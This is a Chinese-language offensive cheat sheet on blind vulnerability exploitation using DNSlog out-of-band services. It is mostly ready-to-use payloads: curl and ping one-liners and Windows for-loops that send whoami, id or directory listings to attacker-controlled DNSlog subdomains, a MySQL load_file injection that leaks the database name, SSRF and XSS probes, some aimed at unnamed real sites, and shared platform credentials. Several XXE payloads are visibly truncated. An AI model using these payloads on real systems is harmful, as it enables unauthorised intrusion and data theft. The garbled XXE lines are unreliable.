dnslog平臺+漏洞盲打合集
dnslog盲打
平臺分析:
dnslog.link,命令執行漏洞的時候搞起ls命令記錄起來很利索,比dnslog.cn快
http://admin.dnslog.link
ping 456.test.dnslog.link
判斷:
https://admin.dnslog.link/api/dns/test/456/
缺點:登陸會暴露記錄,雖然可以點擊clear,單也不保證別人沒存
windows與linux攻擊技巧:
linux:link:curl http://123.test.dnslog.link/`whoami` ping -c 1 `whoami`.123.test.dnslog.linkcn: 5ek72t.dnslog.cncurl http://5axzi7.dnslog.cn/`whoami` ping -c 1 `whoami`.5ek72t.dnslog.cn
如果碰到內容有空格(換行符等),就會截斷,只輸出前面的,這時候可以利用編碼來輸出,但有輸出字符數最大限制;
curl http://test.dnslog.link/$(id|base64) 碰到ls這類多個輸出的命令,直接使用腳本;
for i in $(ls /);do curl "http://$i.123.test.dnslog.link/";done; windows:for i in $(ls /);do curl "http://$i.5ek72t.dnslog.cn/";done; windows:5ek72t.dnslog.cn
windows:
利用HTTP請求:
for /F %x in ('whoami') do start http://test.dnslog.link/%x
將結果使用默認瀏覽器彈出;利用DNS請求:獲取計算機名:
for /F "delims=/" %i in ('whoami') do ping -n 1 %i.test.dnslog.link
獲取用戶名:
for /F "delims=/ tokens=2" %i in ('whoami') do ping -n 1 %i.test.dnslog.link
不能編碼輸出,但利用powershell可以實現;dir有/b參數,不顯示修改日期等信息,只顯示文件名,所以可以彈出;
for /F %x in ('dir /b C:/') do start http://test.dnslog.link/[%x].jpg
某站ping工具命令執行漏洞:dnslog驗證:
三大免費dns解析記錄網站介紹
http://www.dnslog.cn
http://admin.dnslog.link 賬號密碼:test/123456
http://ceye.io
DNSLOG回顯Demo
這樣說原理很抽象,下面通過實際例子看下。有時候http://ceye.io訪問太慢,推薦使用http://www.dnslog.cn平臺或者t00ls的DNSLOG平臺。下面以http://ceye.io 為例子。
http://ceye.io 這是一個免費的記錄dnslog的平臺,我們注冊后到控制面板會給你一個二級域名:xxx.ceye.io,當我們把注入信息放到三級域名那里,后臺的日志會記錄下來。
sql盲注
不論是布爾型盲注還是時間型盲注,都需要頻繁的跑請求才能夠獲取數據庫中的值,在現代 WAF 的防護下,很可能導致 IP 被 ban。我們可以結合 DNSlog 完美快速的將數據取出。如遇到 MySql 的盲注時,可以利用內置函數 load_file() 來完成 DNSlog,load_file()不僅能夠加載本地文件,同時也能對URL發起請求。
payload :1' and load_file(concat('\\\\',(select database()),'.123.test.dnslog.link\\abc'))--+http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select database()),'.52i39v.ceye.io\\abc'))--+
RCE的盲打
操作系統
盲注方式
windows
%variable%
linux
variable 反引號
此處使用公網一個 DVWA 靶場( Windows 系統搭建)為例進行演示,Payload:
%WINDIR%.52i39v.ceye.io
,如下所示:
如果是 Linux 環境,則 Payload 對應的應該為:
ping `whoami`.u4f95y.dnslog.cn
Windows 常用變量:
//變量 類型 描述
//%ALLUSERSPROFILE% 本地 返回“所有用戶”配置文件的位置。
//%APPDATA% 本地 返回默認情況下應用程序存儲數據的位置。
//%CD% 本地 返回當前目錄字符串。
//%CMDCMDLINE% 本地 返回用來啟動當前的 Cmd.exe 的準確命令行。
//%CMDEXTVERSION% 系統 返回當前的“命令處理程序擴展”的版本號。
//%COMPUTERNAME% 系統 返回計算機的名稱。
//%COMSPEC% 系統 返回命令行解釋器可執行程序的準確路徑。
//%DATE% 系統 返回當前日期。使用與 date /t 命令相同的格式。由 Cmd.exe 生成。有關 date 命令的詳細信息,請參閱 Date。
//%ERRORLEVEL% 系統 返回上一條命令的錯誤代碼。通常用非零值表示錯誤。
//%HOMEDRIVE% 系統 返回連接到用戶主目錄的本地工作站驅動器號。基于主目錄值而設置。用戶主目錄是在“本地用戶和組”中指定的。
//%HOMEPATH% 系統 返回用戶主目錄的完整路徑。基于主目錄值而設置。用戶主目錄是在“本地用戶和組”中指定的。
//%HOMESHARE% 系統 返回用戶的共享主目錄的網絡路徑。基于主目錄值而設置。用戶主目錄是在“本地用戶和組”中指定的。
//%LOGONSERVER% 本地 返回驗證當前登錄會話的域控制器的名稱。
//%NUMBER_OF_PROCESSORS% 系統 指定安裝在計算機上的處理器的數目。
//%OS% 系統 返回操作系統名稱。Windows 2000 顯示其操作系統為 Windows_NT。
//%PATH% 系統 指定可執行文件的搜索路徑。
//%PATHEXT% 系統 返回操作系統認為可執行的文件擴展名的列表。
//%PROCESSOR_ARCHITECTURE% 系統 返回處理器的芯片體系結構。值:x86 或 IA64(基于 Itanium)。
//%PROCESSOR_IDENTFIER% 系統 返回處理器說明。
//%PROCESSOR_LEVEL% 系統 返回計算機上安裝的處理器的型號。
//%PROCESSOR_REVISION% 系統 返回處理器的版本號。
//%PROMPT% 本地 返回當前解釋程序的命令提示符設置。由 Cmd.exe 生成。
//%RANDOM% 系統 返回 0 到 32767 之間的任意十進制數字。由 Cmd.exe 生成。
//%SYSTEMDRIVE% 系統 返回包含 Windows server operating system 根目錄(即系統根目錄)的驅動器。
//%SYSTEMROOT% 系統 返回 Windows server operating system 根目錄的位置。
//%TEMP%和%TMP% 系統和用戶 返回對當前登錄用戶可用的應用程序所使用的默認臨時目錄。有些應用程序需要 TEMP,而其他應用程序則需要 TMP。
//%TIME% 系統 返回當前時間。使用與time /t命令相同的格式。由Cmd.exe生成。有關time命令的詳細信息,請參閱 Time。
//%USERDOMAIN% 本地 返回包含用戶帳戶的域的名稱。
//%USERNAME% 本地 返回當前登錄的用戶的名稱。
//%USERPROFILE% 本地 返回當前用戶的配置文件的位置。
//%WINDIR% 系統 返回操作系統目錄的位置。
XXE的盲打
進入靶場實踐
]><name>&hacker;name>
構造讀取本地文件的 Payload:
]><foo>&xxe;foo>
假設這是一個 XXE 無回顯的漏洞,或者說不清楚服務器是什么操作系統、不清楚文件組成,可以構造如下 DNSlog 相關的 Payload:
]><foo>&xxe;foo>
ssrf-dnslog+實戰案例
一、某翻譯-dnslog
http://xxxx.xxx.com/webTransPc/index.html?from=zh-CHS&to=en&type=1&url=http://os1gxn.dnslog.cn
可以看到 DNSlog 平臺成功記錄訪問請求,證明存在 SSRF 漏洞:
http://127.0.0.1/pikachu/vul/ssrf/ssrf_fgc.php?file=http://4zq94q.dnslog.cn/
刷新 DNSlog 服務器的記錄,發現靶場發起的訪問請求記錄:
http://www.dnslog.cn/
XSS的盲打+實戰
在實戰中能真正能構成致命性損傷的 XSS 類型就是儲存型 XSS
有時在留言板提交的申請是不能回顯在前臺而是插入了后臺頁面或者數據庫這時我們就要用盲打dnslog驗證后臺xss是否會觸發
os1gxn.dnslog.cn
某外國網址xss的url請求
http://www.xxx.cn/about.php?id=%3Cscript%20src=http://os1gxn.dnslog.cn%3E%3C/script%3E
